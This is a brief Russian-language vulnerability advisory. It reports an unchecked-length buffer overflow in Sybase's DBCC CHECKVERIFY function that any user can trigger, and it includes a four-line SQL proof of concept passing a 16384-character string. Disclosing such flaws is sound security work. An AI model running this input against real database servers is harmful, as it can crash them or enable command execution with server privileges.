В функции DBCC CHECKVERIFY можно переполнить
буфер и выполнить произвольные команды с
привилегиями сервера. В качестве параметра
функции передается имя базы данных - оно
может быть произвольной длинны, DBCC CHECKVERIFY
никак ее не проверяет и не ограничивает.
Выполнить же эту функцию может любой
пользователь Sybase.
Пример:
1> declare @test varchar(16384)
2> select @test = replicate('A', 16384)
3> DBCC CHECKVERIFY(@test)
4> go
